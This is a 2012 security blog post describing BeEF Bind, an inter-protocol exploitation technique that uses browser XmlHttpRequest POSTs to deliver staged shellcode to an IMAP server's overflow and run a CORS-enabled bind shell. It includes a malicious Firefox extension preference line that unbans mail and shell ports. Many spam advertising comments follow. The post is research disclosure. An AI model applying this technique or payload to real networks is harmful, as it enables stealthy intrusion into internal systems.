Sunday, November 4, 2012

Revitalizing the Inter-Protocol Exploitation with BeEF Bind

My last two talks about BeEF were great successes. I presented together with Ty Miller at RuxCon 2012 in the land of the BeEF, Australia. Then I presented the same talk, unfortunately without Ty, at OWASP AppSec USA, in yet another land of the BeEF, Texas (Austin) :D

The first RuxCon talk was on the first day at 9:00AM in the morning, after a drinking night. The room was also much more full at 9:10AM,  and people couldn't get in :D

Ty and Me
Ty and I decided to release the new BeEF Bind research at RuxCon for various reasons:
  •  RuxCon is an old and underground conference, full of proper hackers and friends, not script-kiddies;
  •  many people from the project (Wade, Brendan, Christian, Ben, Scotty, basically everyone except Ryan, Heather, Saafan, Bart, and Quentin and me :-) are from Australia;
  •  I've never been in the land of the kangaroos.

The research is revitalizing Wade's research on IPEC (2007) in the following ways:
  •  We're using XmlHttpRequest instead of HTML forms to send cross-domain POST requests
  •  A new staging shellcode has been developed to be used specifically for this attack technique
  •  Everything has been merged into BeEF, with new exploitation reliability features

The original idea about IPEC is to exploit "tolerant" network protocols which do not close the client connection if non-valid protocol commands are sent. Lets say you have an IMAP server, and instead of sending LOGIN ciccio PASS pasticcio, which are valid commands, you send LOGIN ciccio CAZZ pasticcio. CAZZ is not a valid command for the IMAP protocol, but even if we fuzz the endpoint for thousand times sending the same CAZZ garbage, the connection is never closed unless we close it explicitly from the socket.

This behavior is different across protocol implementations, so you might find an IMAP implementation which does not behave in the following way. Our tests were focused mainly on IMAP, SIP, IRC and a few SMTP implementations. More details about this will be released in the near future.

You can clearly see that this behavior has an obvious flaw. We can exploit it encapsulating the data for this protocol with another one, lets say HTTP, because data which is not valid is just rejected but it is still parsed. This practically means the following HTTP request can be sent:

Wireshark HTTP Request

The HTTP request headers will be parsed as Bad Commands, while the body of the request will be correctly parsed because a001 LIST is a valid pre-authentication command. After that command we're actually sending shellcode, in this case the stager of the new BeEF Bind shellcode, together with an egg-hunter and current/next SEH pointers because the IMAP server (Eudora Mail 3 v6.1.19.0) is vulnerable to SEH based overflow. When the server will parse the LIST command, the shellcode will be loaded into process's memory binding a socket on port 4444. This is not yet a bind shell.

The next step is sending the stage to this port, as another POST request.

While the stage is running in memory, we have port 4444 listening again, waiting for POST requests like:

Wireshark with stager

Note the Access-Control-Allow-Origin, which enables cross-domain communication using CORS.
This means that after the stage is deployed, we can communicate with the shellcode cross-domain from Javascript, reading the HTTP response without violating/bypassing the Same Origin Policy.

The only cross-domain requests where we can't read the response is when we send the stager and the stage of the shellcode. This would have been very helpful, because we could have fingerprinted the service properly.

From a low-level point of view, you can see how the request looks like in the IMAP process memory:

Sending the POST Request


You can clearly see that the HTTP request headers are in memory, as garbage/NOPs are sent in a normal exploit where we need to fill lets say 800 bytes of memory before reaching the pointers we can overwrite. This adds additional complexity to the exploitation. We cannot know in advance (and we cannot query the XmlHttpRequest object to know it) the exact size of the the HTTP request headers. An error of one byte means the exploit will fail. To calculate the size we send a POST request back to BeEF, on a different socket (to maintain the cross-domain behavior). In this way we can know exactly the size of the headers which will be sent to the target, and we just need to adjust the size considering the Host field which will be clearly different.

Some of you may have been wondering. Wait a sec, how come you can send cross-domain POST requests to port 143? True, there is no magic here.

A pre-requisite is to disable PortBanning for selected ports, and we do that by delivering a malicious Firefox extension. As you know, Firefox extensions have no limitations on which configuration objects to override. So, basically, everything accessible from about:config can be overwritten or modified.

So it's enough to send a malicious (or backdoored) Firefox extension which contains in prefs.js the following line:

pref("", "20,21,22,25,110,143");

to disable PortBanning for those selected ports.

Our research has been focused, and currently works perfectly, on latest Firefox. It works also in WebKit (Chrome/Safari) based browsers if you target not-banned ports. I still need to find a way to disable PortBanning on WebKit based browsers. Opera is still not tested, and Internet Explorer too. For IE there is an additional limitation: it looks like cross-domain POST requests cannot be sent.

The impact of this research is "Rooting your internals" (i.e. internal network services) from a browser which sits in your internal network, using only the browser as a pivot for internal network attacks. The communication with the shellcode is entirely in-browser via BeEF, there are no additional reverse sockets open. From a forensics point of view, this should be much more difficult to understand what's happening, or what happened. The attack is much more stealthy.

Slides from our RuxCon talk here:

I've also uploaded the screencast of the demo we shown at RuxCon on my Vimeo channel:
The demo covers a phishing scenario using the BeEF Social Engineering extension, and shows all the steps required to use the BeEF Bind shellcode: from the malicious Firefox extension delivery, to internal live systems identification and port scanning, finishing with exploitation using IPEC.

Expect more goodness on this topic in the near future.

If you want to help debugging/analyzing known/new exploits and see if they can be ported to this technique, let us know. Your help will be greatly appreciated.


  1. This is really nice and interesting blog.I'm glad to know. I admire the time and effort you put into your blog and detailed information you offer.

    AimIT Software - SEO Company

  2. hey dude..!! thnx for the discussion i really appreciate it but not only our support and comments made this efforts, your also own efforts helps you.. see you on boards dude..!

    RPJ Technologies - Call Center Services transcription services

  3. Thanks for the informative post. It helped me a lot. May the Force be with you.
    Call Centers Republica Dominicana

  4. Houston Seo Services understands that the world of communication has changed and, to make things more challenging, the marketing tools you learned over the years have been totally revamped. You may feel as if you’ve been transported into a business world where you are out of your element. That’s where Houston Seo Services and comes in. In the new world of science and technology, the playing field is anything but level. Countless businesses know they need an online presence, but they have no idea how to make a website perform as the top seller in your operation. If you’ve ever wondered what a “Squidoo” is, you need. Houston Seo Services

  5. Website advertising in Houston is not one of those things that can be brushed off. Without effective advertising your business runs the risk of failure. The question is do you understand what website advertising in Houston entails? For many people they feel that putting up a website is all that has to be done. While having a website is a great thing there is so much more that has to be done.

  6. There are various reasons why you should select Actual SEO Media SEO services for your business. First, you get almost all the necessary SEO services at our company at an affordable price. Actual SEO Media offer services such as content writing and link building among other services for both small and large businesses’ websites. With our assistance, our clients do not have to seek assistance of other SEO companies for Houston Seo services.

  7. hello
    Green Grid System Provides cellular confinement system and Tree Root Guard Importance,specifically designed and sold for Geoweb tree root protection.Call to know about Root Bridge System!

  8. I recently came across your blog and have been reading along. I thought I would leave my first comment. I don't know what to say except that I have enjoyed reading. Compliant labeling Thanks.

  9. Deem as magnanimous beside difference in fiat to blunder for this saintly sale inventory group unusual piddling encompass lace wigs

  10. Most of the butts are often about all-around poly hippo elephant seals which often physiognomy a unique toothed construction. Near to these very small ways this knapsack can almost any exceptional job via residing in organize. Frequent this inlet doesn't have a ado possessing this huge handle with organize.prepaid debit cards

  11. The Usa offers a lot of choices which choosing it's possible to be difficult! Narrow lower your best choices as well as let your whole family bow tie


  12. In your blog I was happy to see your article, better than last time, and have made great progress, I am very pleased. I am looking forward to your article will become better and better.
    hotmail login | red ball |

  13. Thank you for benefiting from time to focus on this kind of, I feel firmly about it and also really like comprehending far more with this particular subject matter. In case doable, when you get know-how, is it possible to thoughts modernizing your site together with far more details? It’s extremely useful to mewhat does it mean to refinance your mortgage

  14. I've read all your information that you shares in your article and I really love it. Thank you for sharing this post. I appreciate it.
    - five nights at freddy's

  15. I've read all your information that you shares in your article and I really love it. Thank you for sharing this post. I appreciate it.
    * Street view

  16. I would like to thank you for the efforts you have made in writing this post.
    - twitter search

  17. I would like to thank you for the efforts you have made in writing this post.
    - twitter search

  18. All the best blogs that is very useful for keeping me share the ideas of the future as well this is really what I was looking for, and I am very happy to come here. Thank you very much
    animal jam codes | five nights at freddy's 4 | hotmail login

  19. Hi author,
    Recently i came across your blog, and you know i love this article while reading.thanks

    I'm David miller living at San Francisco, USA, associated with 31west global services as a creative writer & Digital analyst. 31west is one of the leading Call Center Outsourcing

  20. This is great, That's a great website, it really is what I was looking for, thank you for sharing!
    ymail login | ymail sign in |hotmail sign up |hotmail login

  21. This is one of the cult game now, a lot of people enjoy playing them . Also you can refer to the game :
    animal jam 2 | five nights at freddys 2 | hotmail login

  22. The article you have shared here very good. This is really interesting information for me. Thanks for sharing! login |hotmail login |gmail login


  23. شراء اثاث مستعمل بالرياض
    عزيزي العميل إذا أردت بيع محتويات بيتك القديم أو شركتك القديمة واستبدالها بأخرى جديدة أو مستعملة فنحن في شركة شراء اثاث مستعمل بالرياض سنشتري منك كل الأثاث القديم الذي ترغب في بيعه وشراء بأعلى الأسعار الموجودة في السوق لأننا لا نبخس الأسعار ما يفعل الكثير من التجار عند شراء الأثاث المستعمل.
    شراء الاثاث المستعمل بالرياض
    شراء الاثاث المستعمل بجدة
    شراء الاثاث المستعمل بالمدينة المنورة
    إذا كنت ترغب في التخلص من جميع أثاث منزلك فلا داعي للقلق شراء اثاث مستعمل بالرياض تقوم بتوفير الطيقة المثالية حتى يتم بيع الأثاث بكل سهولة وذلك من خلال توفير التالي :-
    • عدد من الفروع الخاص بعملية شراء الأثاث المستعمل .
    • عدد من الفنيين والخبراء المختصين في تقييم الأثاث حتى تحصل على اعلى سعر عند بيع القطع القديمه .
    • سوف تعمل على توفير مساحة خالية بعد ذلك يمكن ان تستغلها في المكان .
    • العمل على شعور المتواجدين بالراحة النفسية نتيجة إلى التخلص من القطع القديمة .
    شراء الاثاث المستعمل بالرياض
    شراء الاثاث المستعمل بجدة
    شراء الاثاث المستعمل بالمدينة المنورة

  24. حقين شراء اثاث مستعمل في الرياض :
    عزيزي العميل إذا كنت تود أن تغير أثاث منزلك القديم وتود شراء أثاث أخر جديد وليس معك المال الكافي لذلك فنحن فى حقين شراء اثاث مستعمل في الرياض نقوم ببيع الأثاث المستعمل ونتبع الطرق المناسبة عند شراء الأثاث القديم فلا تخاف من عدم جودة الأثاث حيث اننا نقوم بالتالي :-
    • شراء اثاث مستعمل بالرياض يقوم بشراء واعادة بيعجميع قطع الأثاث .
    • يتم تلميع قطع الأثاث وإعادة إصلاح التالف منها ودهنها وعرضها بصورة لا تختلف عن الأثاث الجديد ولكن تكون بأسعار رخيصة وفي متناول يد الجميع.
    • لدينا سيارات متخصص في نقل الأثاث المستعمل إلى مكان المنزل مهما كان موقعه.
    • لدينا أفضل العمالة المدربة على نقل الأثاث بكل احترافية ومهارة في حمل قطع الأثاث وتوصيلها إليكم دون التعرض للتلف أو الكسر .
    • يوجد لدى الشركة أوناش لرفع الأثاث إذا كنتم ممن تسكنون في الأدوار العليا فلا داعي للقلق .
    شراء الاثاث المستعمل بالرياض
    شراء الاثاث المستعمل بجدة
    شراء الاثاث المستعمل بالمدينة المنورة
    في حالة الرغبة من السفر أو الهجرة خارج البلاد لفترة طويلة ولا تعرف أين تتخلص من أثاثك القديم فالآن شراء اثاث مستعمل بالرياض قامت بحل هذه المشكلة الآن يمنكم الاتصال بنا فورًا على ارقام محلات شراء اثاث مستعمل الرياض وذلك من خلال الأرقام المعلن عنها من خلال الانترنت وسوف يرد عليكم خدمة العملاء وتلقي طلباتكم حيث أن لدى شركة شراء اثاث مستعمل بالرياض فريق خدمة عملاء يعمل على مدار أربع وعشرين ساعة لخدمتكم وعقب القيام بالاتصال بنا نقوم بالآتي :
    • عند تحديد الموعد المناسب إليكم تقوم الشركة بإرسال مندوب لكم لمعاينة قطع الأثاث المراد بيعها والاتفاق معكم على أفضل سعر للأثاث المراد بيعه.
    • ثم إرسال فريق متخصص من قبل الشركة لدينا في فك قطع الأثاث بكل احترافية فلا داعي للاستعانة بنجارين أو فنيين لفك الأثاث القديم فنحن نقدم لكم تلك الخدمة مجانًا من الشركة.
    • بعدها يتم وضع الأثاث في الاسفل والعمل على رشة جيدا للحفاظ على العملاء الجدد من الاصابة في حالة بيعه .
    شراء الاثاث المستعمل بالرياض
    شراء الاثاث المستعمل بجدة

  25. I found a lot of information here! This article is really good for all newbie here. Thank you for sharing with us!
    happy wheels

  26. This article is very nice as well as very informative. I have known very important things over here. I want to thank you for this informative read deskgram

  27. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  28. sniper 3 mod

    It is because we bring the easiest solution to you – Sniper 3D Mod Apk! ... Instructions to Use Sniper 3D Mod Apk On Android? ... Our Sniper 3D Mod Apk enables players to add unlimited diamonds and coins they need in the game.

  29. Those who are searching over internet 'economics assignment help' contact with us now. We are the best assignment writing service provider in Australia. Our Academic assignment writers available 24*7 hours for the students, if you really want to need assignment help online at cheapest price meet assignment maker at sample assignment and get high distinction grades. We are here to help you with 100% plagiarism free assignment help perth Australia. We offers lowest price on all kind of dissertations, essay writing, Finance assignment help, and more from 4000+ Ph.D. Experts

  30. Each comment is an opinion, I often read it for a broader view

  31. To ease services,we avail web portal for best nursing writing services where US students make “write my essay” write my research paper and “write my paper” requests.

  32. Our company is the best online solution in offering best research paper writing service since we hire professional writers who have years of experience in online essay writer services.

  33. Amazing Article ! I have bookmarked this article page as i received good information from this.

  34. We are the best writing company providing Custom Dissertation Writing Service combined with a vast array of services. We offer College Term Paper Writing Services, essay assistance, dissertation writing services and research writing help.

  35. لأننا شركة لمكافحة الحشرات في الدمام تعمل من أجل راحتك ولا تهتم بصحتك وتوفر لك ما يوفر لك من الحشرات المزعجة لك ولأطفالك
    شركة مكافحة النمل الابيض بالخبر
    شركة مكافحة حشرات بالخبر
    شركة رش مبيدات بالخبر
    ارخص شركة مكافحة حشرات